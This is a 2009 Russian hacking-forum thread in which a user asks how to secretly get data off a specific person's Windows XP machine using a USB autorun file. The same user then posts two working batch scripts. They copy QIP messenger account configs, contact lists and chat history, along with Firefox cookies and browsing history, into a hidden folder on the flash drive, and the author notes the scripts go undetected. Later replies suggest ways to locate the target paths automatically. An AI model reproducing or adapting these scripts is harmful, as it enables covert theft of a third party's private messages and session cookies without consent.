Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   bat файл открывающий RDP порт (https://forum.antichat.xyz/showthread.php?t=152084)

veter069 29.10.2009 13:10
bat файл открывающий RDP порт
 
Есть человек ОС XP антивируса нет ip динамика.
Нужно прописать запуск bat файла в autorun.inf флешки,
a также реализовать открытие rdp порта этим файлом или украсть историю qip 2005, куки firefoxa.

$n@ke 29.10.2009 14:45
Класс, самовнушение очень сильная тема!
Поделишся методой,если получится?

tshift 29.10.2009 14:48
анреал

wkar 29.10.2009 14:48
http://www.hackzone.ru/articles/vzlom_cherez_telnet.html

veter069 29.10.2009 15:13
делюсь
 
код батника

@echo off
set TOM=D:
set FRFOX="%APPDATA%"\Mozilla\Firefox\Profiles
set QIPUSERDIR="C:\Soft\QIP\Users
set FFPROFILE=mde6kq23.default
set QIPUSER=9416623
set MYFOLDER=ETRIMUS
set MYQIP=qip
set MYMOZ=moz

cd "%PROGRAMFILES%"
md "%MYFOLDER%"
cd "%MYFOLDER%"
md "%MYQIP%"

cd "%QIPUSERDIR%"
copy Accounts.cfg "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y
cd "%QIPUSERDIR%"\"%QIPUSER%"
copy _botq.txt "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y
copy _st_cust.txt "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y
copy %QIPUSER%.cl "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y
copy %QIPUSER%.clg "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y
copy %QIPUSER%.cli "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y
copy %QIPUSER%.clv "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y
copy Config.ini "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y

Он не скрыт тырит файлы кипа сохраняет пока в созданнуую папку в program files , ничем не палится. Нужно точно знать путь до кипа.

veter069 29.10.2009 21:07
дороботанный код

@echo off
chcp 1251
set TOM1=C:
set TOM2=E:
set FRFOX="%APPDATA%"\Mozilla\Firefox\Profiles
set QIPUSERDIR=\Soft\QIP\Users
set FFPROFILE=kv2aiqw5.default
set QIPUSER=9416623
set MYFOLDER=ETRIMUS
set MYMOZ=mozETRIM
set MYQIP=qipETRIM
set HIST=historyETRIM
set NOSITEL=%cd%

attrib -a -r -s -h "%NOSITEL%"\*.* /s /d

md "%MYFOLDER%"
cd "%MYFOLDER%"
md "%MYMOZ%"
md "%MYQIP%"\"%HIST%"

%TOM1%
cd "%FRFOX%"\"%FFPROFILE%"

copy cookies.sqlite "%NOSITEL%"\"%MYFOLDER%"\"%MYMOZ%" /y
copy places.sqlite "%NOSITEL%"\"%MYFOLDER%"\"%MYMOZ%" /y

%TOM1%
cd "%QIPUSERDIR%"
copy Accounts.cfg "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
cd "%QIPUSERDIR%"\"%QIPUSER%"
copy _botq.txt "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
copy _st_cust.txt "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
copy %QIPUSER%.cl "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
copy %QIPUSER%.clg "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
copy %QIPUSER%.cli "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
copy %QIPUSER%.clv "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
copy Config.ini "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
xcopy "%QIPUSERDIR%"\"%QIPUSER%"\History "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%"\"%HIST%" /y

attrib +h "%NOSITEL%"\*.* /s /d
attrib -h "%NOSITEL%"\*.* /s

pause > nul

Он не скрыт, не палиться создает в своей директории скрытую папку в которую сохраняет историю кипа и куки, закладки мазилы. Нужно знать путь до qip и название профиля в мазиле.

PHOEN_i_X 02.11.2009 21:33
Доступ по RDP на динамическом IP ? ) Ты сам пробывал ? ))

Иван8 02.11.2009 21:46
А путь до квипа и файрфокса можно попробовать получить через dir и findstr, но это сильно замедлит работу.


Время: 09:15